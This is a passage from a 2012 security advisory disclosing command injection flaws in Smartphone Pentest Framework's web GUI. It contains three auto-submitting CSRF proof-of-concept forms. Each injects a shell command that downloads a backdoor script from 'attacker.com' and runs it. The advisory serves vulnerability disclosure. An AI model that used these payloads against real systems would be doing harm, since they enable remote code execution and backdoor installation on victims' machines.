Therefore, even if the web server hosting the SPF GUI is not accessible from the Internet (which is the case for the majority of pentesters), the vulnerabilities can still be easily exploited from a local/internal network, or even from the Internet via a CSRF vector. In the default installation of Smartphone Pentest Framework, the web server port and the application path of its GUI are easily predictable: localhost:80/frameworkgui/ \nPlease refer to the HTB23123 advisory (https://www.immuniweb.com/advisory/HTB23123) for detailed examples of attack scenarios. \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitization of user-supplied input passed as an argument to the \"system()\" function (presumably in its single-string form, which is interpreted by the shell, so metacharacters such as \"&\" and \"&&\" in the PoCs below terminate the intended command and start the attacker's). This could be exploited to inject and execute arbitrary OS commands on the target system with the privileges of the web server user. \n1.1 The vulnerability exists in the \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via a CSRF vector. \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on the pentester's machine with the privileges of the web server. Despite these relatively low privileges, an attacker can still try to read all files accessible to the web server user and/or attempt to escalate privileges to obtain remote root access to the system. 
\n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n\n", "modified": "2012-12-11T00:00:00", "published": "2012-11-19T00:00:00", "id": "HTB23127", "href": "https://www.htbridge.com/advisory/HTB23127", "type": "htbridge", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C/"}}]}